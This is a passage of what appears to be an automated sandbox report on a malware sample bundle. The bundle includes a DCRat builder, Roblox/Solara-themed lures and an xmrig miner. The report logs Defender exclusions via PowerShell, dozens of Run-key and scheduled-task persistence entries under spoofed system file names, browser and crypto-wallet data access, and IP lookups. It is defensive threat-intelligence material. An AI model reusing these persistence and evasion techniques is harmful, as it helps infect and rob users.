resource yara_rule behavioral1/memory/5772-1038-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/5772-1036-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/5772-1048-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/5772-1050-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/5772-1049-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/5772-1047-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/5772-1051-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/5772-1114-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/5772-1373-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/5772-1375-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/5772-1374-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 39 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2748 powershell.exe 1032 powershell.exe 60 powershell.exe 400 powershell.exe 5444 powershell.exe 1852 powershell.exe 5928 powershell.exe 828 powershell.exe 416 powershell.exe 7124 powershell.exe 2812 powershell.exe 5856 powershell.exe 6232 powershell.exe 5412 powershell.exe 1688 powershell.exe 3380 powershell.exe 6700 powershell.exe 4172 powershell.exe 2700 powershell.exe 5952 powershell.exe 5728 powershell.exe 388 powershell.exe 456 powershell.exe 3688 powershell.exe 924 powershell.exe 3680 powershell.exe 4100 powershell.exe 2836 powershell.exe 1664 powershell.exe 3116 powershell.exe 1116 powershell.exe 1996 powershell.exe 4364 powershell.exe 3168 powershell.exe 1520 powershell.exe 3616 powershell.exe 5744 powershell.exe 5912 powershell.exe 7060 powershell.exe -
Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
-
.NET Reactor proctector 3 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Youtube.exe net_reactor behavioral1/memory/5044-20-0x0000000000400000-0x0000000000D8F000-memory.dmp net_reactor behavioral1/memory/5072-56-0x0000000000400000-0x0000000000CC7000-memory.dmp net_reactor -
Checks computer location settings 2 TTPs 12 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Youtube.exeDCRatBuild.exesolara.exeWScript.exeWScript.exeComContainerbrowserRefRuntime.exeRoblox.exeSolaraBootstrapper.exeResult.exeFrage build.exeRefcrt.exeWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation Youtube.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation DCRatBuild.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation solara.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation ComContainerbrowserRefRuntime.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation Roblox.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation SolaraBootstrapper.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation Result.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation Frage build.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation Refcrt.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 15 IoCs
Processes:
Youtube.exefaildsfsdf.exeResult.exeDCRatBuild.exeBloxstrap.exeFrage build.exeSolaraBootstrapper.exesolara.exeRefcrt.exesmss.exeComContainerbrowserRefRuntime.exeRoblox.exeBloxstrap.exeRuntimeBroker.exeTrustedInstaller.exepid process 5072 Youtube.exe 2568 faildsfsdf.exe 5100 Result.exe 4140 DCRatBuild.exe 392 Bloxstrap.exe 1660 Frage build.exe 3012 SolaraBootstrapper.exe 3504 solara.exe 4084 Refcrt.exe 6104 smss.exe 2556 ComContainerbrowserRefRuntime.exe 5428 Roblox.exe 7056 Bloxstrap.exe 5564 RuntimeBroker.exe 6300 TrustedInstaller.exe -
Loads dropped DLL 64 IoCs
Processes:
MsiExec.exeMsiExec.exesmss.exeComContainerbrowserRefRuntime.exeRoblox.exeschtasks.exeschtasks.exeschtasks.execsc.execsc.execsc.execsc.execsc.execsc.execsc.execsc.execsc.execsc.execsc.execsc.execsc.execsc.execsc.execsc.exeschtasks.exeschtasks.exeschtasks.exepid process 3592 MsiExec.exe 3592 MsiExec.exe 4396 MsiExec.exe 5608 6352 6104 smss.exe 4396 MsiExec.exe 4396 MsiExec.exe 5972 2556 ComContainerbrowserRefRuntime.exe 2740 5300 5888 5428 Roblox.exe 4924 schtasks.exe 5124 schtasks.exe 4468 schtasks.exe 4060 6404 csc.exe 6164 6136 csc.exe 2156 1508 csc.exe 2264 3396 csc.exe 3784 6300 csc.exe 6016 1072 5816 csc.exe 6272 5884 csc.exe 2808 1312 csc.exe 6640 6800 csc.exe 6796 6976 csc.exe 7012 6964 csc.exe 7100 7088 csc.exe 7152 7116 csc.exe 5764 5684 csc.exe 5608 3336 csc.exe 6684 6652 csc.exe 544 schtasks.exe 6112 schtasks.exe 6036 schtasks.exe 1456 5416 3260 3652 3952 4288 5704 3460 3044 4880 3604 -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 43 IoCs
Processes:
Refcrt.exeRoblox.exefaildsfsdf.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Recovery\\WindowsRE\\csrss.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\DriversavessessionDlldhcp\\Refcrt.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\Cursors\\smss.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Recovery\\WindowsRE\\conhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Recovery\\WindowsRE\\conhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TrustedInstaller = "\"C:\\Users\\Admin\\AppData\\Local\\TrustedInstaller.exe\"" Roblox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\faildsfsdf = "\"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Windows\\fr-FR\\conhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Users\\All Users\\Documents\\conhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysmon = "\"C:\\DriversavessessionDlldhcp\\sysmon.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Recovery\\WindowsRE\\csrss.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\faildsfsdf = "\"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\Cursors\\smss.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\backgroundTaskHost = "\"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\backgroundTaskHost = "\"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Windows\\fr-FR\\conhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\winNet\\fontdrvhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\winNet\\Refcrt.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\winNet\\Refcrt.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" Roblox.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Program Files (x86)\\Internet Explorer\\ja-JP\\smss.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\DriversavessessionDlldhcp\\cmd.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\winNet\\fontdrvhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SolaraBootstrapper = "\"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\DriversavessessionDlldhcp\\cmd.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Registry = "\"C:\\Users\\Default\\Pictures\\Registry.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Users\\All Users\\Documents\\conhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\Recovery\\WindowsRE\\Refcrt.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" Roblox.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Paint = "C:\\Users\\Admin\\Music\\xdwdAdobe Illustrator.exe" faildsfsdf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\DriversavessessionDlldhcp\\Refcrt.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SolaraBootstrapper = "\"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Registry = "\"C:\\Users\\Default\\Pictures\\Registry.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Program Files (x86)\\Internet Explorer\\ja-JP\\smss.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysmon = "\"C:\\DriversavessessionDlldhcp\\sysmon.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\Recovery\\WindowsRE\\Refcrt.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TrustedInstaller = "\"C:\\Users\\Admin\\AppData\\Local\\TrustedInstaller.exe\"" Roblox.exe -
Blocklisted process makes network request 2 IoCs
Processes:
msiexec.exeflow pid process 28 2424 msiexec.exe 30 2424 msiexec.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exedescription ioc process File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 26 ip-api.com 46 ipinfo.io 47 ipinfo.io -
Drops file in System32 directory 2 IoCs
Processes:
csc.exedescription ioc process File created \??\c:\Windows\System32\CSC9923422659A044C39A5D951F6C4B4A87.TMP csc.exe File created \??\c:\Windows\System32\sobql9.exe csc.exe -
Drops file in Program Files directory 23 IoCs
Processes:
Refcrt.exeComContainerbrowserRefRuntime.execsc.execsc.execsc.execsc.exedescription ioc process File created C:\Program Files (x86)\Microsoft.NET\RedistList\faildsfsdf.exe Refcrt.exe File created C:\Program Files (x86)\Internet Explorer\ja-JP\69ddcba757bf72 Refcrt.exe File opened for modification C:\Program Files (x86)\Windows Portable Devices\ComContainerbrowserRefRuntime.exe ComContainerbrowserRefRuntime.exe File created \??\c:\Program Files (x86)\Internet Explorer\ja-JP\CSC7EF3102F42B4454780319C960827883.TMP csc.exe File created \??\c:\Program Files\WindowsPowerShell\dllhost.exe csc.exe File created C:\Program Files\WindowsPowerShell\dllhost.exe Refcrt.exe File created C:\Program Files\Uninstall Information\1143e5710f078d Refcrt.exe File created C:\Program Files (x86)\Windows Portable Devices\ComContainerbrowserRefRuntime.exe ComContainerbrowserRefRuntime.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\unsecapp.exe ComContainerbrowserRefRuntime.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\29c1c3cc0f7685 ComContainerbrowserRefRuntime.exe File created \??\c:\Program Files (x86)\Microsoft.NET\RedistList\CSC7A0F739559C14E76B9FCB2905B968626.TMP csc.exe File created \??\c:\Program Files (x86)\Microsoft.NET\RedistList\faildsfsdf.exe csc.exe File created \??\c:\Program Files\WindowsPowerShell\CSCBA97CDFE29334993A62C13D44C919133.TMP csc.exe File created C:\Program Files\WindowsPowerShell\5940a34987c991 Refcrt.exe File created C:\Program Files\Uninstall Information\SolaraBootstrapper.exe Refcrt.exe File created C:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe Refcrt.exe File created C:\Program Files (x86)\Windows Defender\ja-JP\SolaraBootstrapper.exe ComContainerbrowserRefRuntime.exe File created C:\Program Files (x86)\Windows Defender\ja-JP\1143e5710f078d ComContainerbrowserRefRuntime.exe File created \??\c:\Program Files\Uninstall Information\CSC7DE149071344984BABDF789467E5B10.TMP csc.exe File created \??\c:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe csc.exe File created C:\Program Files (x86)\Microsoft.NET\RedistList\331d3f61e3e52a Refcrt.exe File created C:\Program Files (x86)\Windows Portable Devices\33f6b6f444b053 ComContainerbrowserRefRuntime.exe File created \??\c:\Program Files\Uninstall Information\SolaraBootstrapper.exe csc.exe -
Drops file in Windows directory 26 IoCs
Processes:
Refcrt.exemsiexec.execsc.execsc.exefaildsfsdf.exedescription ioc process File created C:\Windows\Vss\Writers\Application\WmiPrvSE.exe Refcrt.exe File opened for modification C:\Windows\Installer\MSID1AA.tmp msiexec.exe File created C:\Windows\Cursors\smss.exe Refcrt.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSIE63C.tmp msiexec.exe File opened for modification C:\Windows\Installer\e57cdef.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIF495.tmp msiexec.exe File created C:\Windows\Vss\Writers\Application\24dbde2999530e Refcrt.exe File created C:\Windows\SKB\LanguageModels\RuntimeBroker.exe Refcrt.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\SKB\LanguageModels\9e8d7a4ca61bd9 Refcrt.exe File created C:\Windows\Cursors\69ddcba757bf72 Refcrt.exe File created C:\Windows\fr-FR\088424020bedd6 Refcrt.exe File created \??\c:\Windows\Vss\Writers\Application\CSC1695FE976BC94F94849813BF48BB424.TMP csc.exe File opened for modification C:\Windows\Installer\MSID11B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID16A.tmp msiexec.exe File created C:\Windows\fr-FR\conhost.exe Refcrt.exe File created C:\Windows\Installer\SourceHash{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC} msiexec.exe File created C:\Windows\Installer\e57cdef.msi msiexec.exe File created \??\c:\Windows\SKB\LanguageModels\CSCF579D11E63E4D1AA25EA79FCBFF6CC.TMP csc.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\xdwd.dll faildsfsdf.exe File created \??\c:\Windows\Vss\Writers\Application\WmiPrvSE.exe csc.exe File created C:\Windows\OCR\en-us\RuntimeBroker.exe Refcrt.exe File opened for modification C:\Windows\Installer\MSIF504.tmp msiexec.exe File created \??\c:\Windows\SKB\LanguageModels\RuntimeBroker.exe csc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 6 IoCs
Processes:
Frage build.exesolara.exeRefcrt.exeComContainerbrowserRefRuntime.exeRoblox.exeDCRatBuild.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings Frage build.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings solara.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings Refcrt.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings ComContainerbrowserRefRuntime.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings Roblox.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings DCRatBuild.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2868 schtasks.exe 5736 schtasks.exe 1272 schtasks.exe 2756 schtasks.exe 5176 schtasks.exe 7112 schtasks.exe 2012 schtasks.exe 5124 schtasks.exe 1508 schtasks.exe 5360 schtasks.exe 3964 schtasks.exe 2264 schtasks.exe 2944 schtasks.exe 3916 schtasks.exe 6252 schtasks.exe 4392 schtasks.exe 944 schtasks.exe 1032 schtasks.exe 6944 schtasks.exe 1688 schtasks.exe 2556 schtasks.exe 4060 schtasks.exe 3336 schtasks.exe 6996 schtasks.exe 5356 schtasks.exe 6216 schtasks.exe 5488 schtasks.exe 3864 schtasks.exe 5436 schtasks.exe 7012 schtasks.exe 7148 schtasks.exe 3252 schtasks.exe 552 schtasks.exe 3460 schtasks.exe 1408 schtasks.exe 2492 schtasks.exe 6440 schtasks.exe 3040 schtasks.exe 3720 schtasks.exe 4188 schtasks.exe 2728 schtasks.exe 6424 schtasks.exe 1924 schtasks.exe 376 schtasks.exe 5428 schtasks.exe 1552 schtasks.exe 4240 schtasks.exe 2404 schtasks.exe 2004 schtasks.exe 6112 schtasks.exe 6576 schtasks.exe 3776 schtasks.exe 4440 schtasks.exe 4468 schtasks.exe 6560 schtasks.exe 3116 schtasks.exe 400 schtasks.exe 5824 schtasks.exe 3208 schtasks.exe 60 schtasks.exe 964 schtasks.exe 4892 schtasks.exe 3204 schtasks.exe 324 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
SolaraBootstrapper.exeRefcrt.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3012 SolaraBootstrapper.exe 3012 SolaraBootstrapper.exe 4084 Refcrt.exe 4084 Refcrt.exe 4084 Refcrt.exe 4084 Refcrt.exe 4084 Refcrt.exe 4084 Refcrt.exe 4084 Refcrt.exe 4084 Refcrt.exe 4084 Refcrt.exe 4084 Refcrt.exe 4084 Refcrt.exe 4084 Refcrt.exe 4084 Refcrt.exe 4084 Refcrt.exe 4084 Refcrt.exe 4084 Refcrt.exe 4084 Refcrt.exe 4084 Refcrt.exe 4084 Refcrt.exe 4084 Refcrt.exe 4084 Refcrt.exe 4084 Refcrt.exe 924 powershell.exe 924 powershell.exe 3380 powershell.exe 3380 powershell.exe 1996 powershell.exe 1996 powershell.exe 1116 powershell.exe 1116 powershell.exe 416 powershell.exe 416 powershell.exe 1520 powershell.exe 1520 powershell.exe 456 powershell.exe 456 powershell.exe 3680 powershell.exe 3680 powershell.exe 1664 powershell.exe 1664 powershell.exe 3688 powershell.exe 3168 powershell.exe 3168 powershell.exe 3688 powershell.exe 1688 powershell.exe 1688 powershell.exe 400 powershell.exe 828 powershell.exe 400 powershell.exe 828 powershell.exe 2836 powershell.exe 2836 powershell.exe 1032 powershell.exe 1032 powershell.exe 2748 powershell.exe 2748 powershell.exe 4100 powershell.exe 4100 powershell.exe 388 powershell.exe 388 powershell.exe 60 powershell.exe 60 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
faildsfsdf.exeSolaraBootstrapper.exeRefcrt.exemsiexec.exemsiexec.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2568 faildsfsdf.exe Token: SeDebugPrivilege 3012 SolaraBootstrapper.exe Token: SeDebugPrivilege 4084 Refcrt.exe Token: SeShutdownPrivilege 4476 msiexec.exe Token: SeIncreaseQuotaPrivilege 4476 msiexec.exe Token: SeSecurityPrivilege 2424 msiexec.exe Token: SeCreateTokenPrivilege 4476 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4476 msiexec.exe Token: SeLockMemoryPrivilege 4476 msiexec.exe Token: SeIncreaseQuotaPrivilege 4476 msiexec.exe Token: SeMachineAccountPrivilege 4476 msiexec.exe Token: SeTcbPrivilege 4476 msiexec.exe Token: SeSecurityPrivilege 4476 msiexec.exe Token: SeTakeOwnershipPrivilege 4476 msiexec.exe Token: SeLoadDriverPrivilege 4476 msiexec.exe Token: SeSystemProfilePrivilege 4476 msiexec.exe Token: SeSystemtimePrivilege 4476 msiexec.exe Token: SeProfSingleProcessPrivilege 4476 msiexec.exe Token: SeIncBasePriorityPrivilege 4476 msiexec.exe Token: SeCreatePagefilePrivilege 4476 msiexec.exe Token: SeCreatePermanentPrivilege 4476 msiexec.exe Token: SeBackupPrivilege 4476 msiexec.exe Token: SeRestorePrivilege 4476 msiexec.exe Token: SeShutdownPrivilege 4476 msiexec.exe Token: SeDebugPrivilege 4476 msiexec.exe Token: SeAuditPrivilege 4476 msiexec.exe Token: SeSystemEnvironmentPrivilege 4476 msiexec.exe Token: SeChangeNotifyPrivilege 4476 msiexec.exe Token: SeRemoteShutdownPrivilege 4476 msiexec.exe Token: SeUndockPrivilege 4476 msiexec.exe Token: SeSyncAgentPrivilege 4476 msiexec.exe Token: SeEnableDelegationPrivilege 4476 msiexec.exe Token: SeManageVolumePrivilege 4476 msiexec.exe Token: SeImpersonatePrivilege 4476 msiexec.exe Token: SeCreateGlobalPrivilege 4476 msiexec.exe Token: SeRestorePrivilege 2424 msiexec.exe Token: SeTakeOwnershipPrivilege 2424 msiexec.exe Token: SeRestorePrivilege 2424 msiexec.exe Token: SeTakeOwnershipPrivilege 2424 msiexec.exe Token: SeRestorePrivilege 2424 msiexec.exe Token: SeTakeOwnershipPrivilege 2424 msiexec.exe Token: SeRestorePrivilege 2424 msiexec.exe Token: 